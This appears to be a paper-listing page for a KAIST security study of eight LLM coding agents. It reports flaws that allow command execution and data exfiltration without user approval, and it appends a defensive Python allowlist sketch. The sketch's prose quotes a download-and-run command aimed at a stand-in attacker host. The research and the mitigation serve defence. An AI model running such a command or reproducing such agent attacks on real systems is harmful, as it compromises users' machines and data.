Takedown: How It's Done in Modern Coding Agent Exploits

📅 2025-09-28
📈 Citations: 0
Influential: 0
🤖 AI Summary
This work presents the first end-to-end security assessment of eight mainstream LLM-powered coding agents, identifying 15 exploitable vulnerabilities across core components, including task parsing, code generation, and execution environments. Methodologically, the authors combine dynamic analysis, static code review, and attack-chain modeling to uncover compound security flaws, with particular emphasis on systemic risks arising from insecure inter-component interactions. The evaluation reveals that five agents suffer from arbitrary command execution vulnerabilities requiring no user interaction, while four permit global exfiltration of sensitive user data. Beyond empirically exposing critical security gaps in current coding agents that prior literature had not addressed, the study introduces the first structured security assessment framework designed specifically for coding agents, offering both theoretical foundations and practical guidelines for building trustworthy LLM-based software development systems.

📝 Abstract
Coding agents, which are LLM-driven agents specialized in software development, have become increasingly prevalent in modern programming environments. Unlike traditional AI coding assistants, which offer simple code completion and suggestions, modern coding agents tackle more complex tasks with greater autonomy, such as generating entire programs from natural language instructions. To enable such capabilities, modern coding agents incorporate extensive functionalities, which in turn raise significant concerns over their security and privacy. Despite their growing adoption, systematic and in-depth security analysis of these agents has largely been overlooked. In this paper, we present a comprehensive security analysis of eight real-world coding agents. Our analysis addresses the limitations of prior approaches, which were often fragmented and ad hoc, by systematically examining the internal workflows of coding agents and identifying security threats across their components. Through the analysis, we identify 15 security issues, including previously overlooked or missed issues, that can be abused to compromise the confidentiality and integrity of user systems. Furthermore, we show that these security issues are not merely individual vulnerabilities, but can collectively lead to end-to-end exploitations. By leveraging these security issues, we successfully achieved arbitrary command execution in five agents and global data exfiltration in four agents, all without any user interaction or approval. Our findings highlight the need for a comprehensive security analysis in modern LLM-driven agents and demonstrate how insufficient security considerations can lead to severe vulnerabilities.
Problem

Research questions and friction points this paper is trying to address.

Analyzing security vulnerabilities in modern LLM-driven coding agents
Identifying threats compromising user system confidentiality and integrity
Demonstrating end-to-end exploitations enabling unauthorized command execution
Innovation

Methods, ideas, or system contributions that make the work stand out.

Systematically analyzed internal workflows of coding agents
Identified security threats across multiple agent components
Achieved exploitation without user interaction or approval
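The vulnerability class central to the paper, agents executing model-suggested commands without user approval, can be illustrated with a minimal sketch. This is a hypothetical mitigation example, not code from the paper: the function names and the allowlist are assumptions introduced purely for illustration. It shows why an agent that pipes LLM output straight into a shell is one prompt injection away from arbitrary command execution, and how a coarse program allowlist checked before execution blocks the obvious payloads.

```python
import shlex
import subprocess

# Illustrative allowlist of programs the hypothetical agent may run.
# (Assumption for this sketch; real agents would need a far richer policy.)
ALLOWED = {"ls", "cat", "git", "echo"}

def run_agent_command(suggestion: str) -> str:
    """Execute a model-suggested command only if its program is allowlisted.

    shlex.split parses the suggestion without invoking a shell, so shell
    metacharacters like `|` or `;` are treated as literal arguments rather
    than as command chaining.
    """
    argv = shlex.split(suggestion)
    if not argv or argv[0] not in ALLOWED:
        raise PermissionError(f"blocked non-allowlisted command: {suggestion!r}")
    # shell=False (the default) prevents the suggestion from being
    # interpreted by a shell, closing the injection-via-metacharacter path.
    return subprocess.run(argv, capture_output=True, text=True).stdout
```

A prompt-injected suggestion such as `curl http://attacker.example/x.sh | sh` is rejected outright because `curl` is not allowlisted, while a benign `echo ok` still runs. Allowlisting the program name alone is deliberately crude; the paper's findings suggest real agents need defenses at every component boundary, not just at the execution step.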
Eunkyu Lee
KAIST, Daejeon, Republic of Korea
Donghyeon Kim
KAIST, Daejeon, Republic of Korea
Wonyoung Kim
KAIST, Daejeon, Republic of Korea
Insu Yun
KAIST, Daejeon, Republic of Korea
Security · Systems